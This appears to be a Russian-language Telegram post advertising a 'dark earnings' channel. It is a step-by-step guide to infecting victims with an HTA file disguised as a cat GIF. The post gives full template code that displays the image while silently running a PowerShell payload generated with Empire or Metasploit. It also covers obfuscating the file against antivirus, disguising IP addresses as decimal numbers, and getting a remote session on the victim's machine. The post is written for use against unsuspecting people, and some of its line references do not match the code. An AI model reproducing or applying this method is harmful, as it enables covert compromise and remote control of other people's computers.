Заражение через GIF: Котики или Члены

Заражение через GIF: Котики или Члены

https://t.me/the_darkest

Подпишись на наш канал https://t.me/the_darkest если хочешь ещё больше годных тем заработка. 



Идем искать картинку (живую) то есть gif-ку

Далее нам по требуется код:

генерируем powershell в Empire или Metasploit

>>>КОД СКРИПТА<<<

  1. <html>
  2. <head>
  3. <title>NazvanieGif</title>
  4. <hta:application id="NazvanieGif"
  5. border="thin"
  6. borderstyle="complex"
  7. maximizeButton="no"
  8. minimizeButton="no"
  9. />
  10. </head>
  11. <script type="text/javascript">
  12. var index = -1;
  13. var images = [
  14. "data:image/gif;base64,"];
  15. function initGallery(){
  16. window.resizeTo(300,300);
  17. htaPayload();
  18. nextPicture();
  19. }
  20. function nextPicture(){
  21. var img;
  22. index = index + 1;
  23. if (index > images.length -1 ){
  24. index = 0;
  25. }
  26. img = document.getElementById("gallery");
  27. img.src = images[index];
  28. }
  29. function htaPayload(){
  30. var payload="";
  31. try{
  32. if (navigator.userAgent.indexOf("Windows") !== -1){
  33. new ActiveXObject("WScript.Shell").Run("CMD /C START /B " + payload, false);
  34. }
  35. }
  36. catch(e){
  37. }
  38. }
  39. </script>
  40. <style>
  41. #gallery, div {
  42. width: 100%;
  43. height: 100%;
  44. }
  45. #outer {
  46. text-align: center;
  47. }
  48. #inner{
  49. display: inline-block;
  50. }
  51. body {
  52. background-color: black;
  53. }
  54. </style>
  55. <body onload="initGallery()">
  56. <div id="outer">
  57. <div id="inner">
  58. <img id="gallery" onclick="nextPicture()">
  59. </div>
  60. </div>
  61. </body>
  62. </html>

и вставляем в 37 строчку, между)


Далее переходим на очень полезный онлайн ресурс иногда кстати выручает для различного рода задач, например кодировке IP адреса в бинарник для последущего его скрытия, не множечко отступлю от темы покажу: например скрываем 127.0.0.1

127 = 1111111, 0 = 0 и 1 = 1 преобразовываем точки и получаем 01111111000000000000000000000001 = 2130706433 ИТОГ http: // 2130706433

так вот переводим нашу GIF-ку в формат base64, копируем полученную кодировочку и вставляем в

как видите в 17 строку


Осталось последнее действие - конвертировать, а точнее обфусцировать, то есть спрятать вредный код от антивирусов в этой замечательной программе

сохраняем полученный код в блокноте, под любым именем но в формате .hta

Заключение: При запуске у жертвы появится Ваша злая GIF-ka c котикам или c ..уем, а к Вам прилетит заветная сессия


THEDARKEST

https://t.me/the_darkest Be The Darkest

Report content on this page

Report Page

Please submit your DMCA takedown request to dmca@telegram.org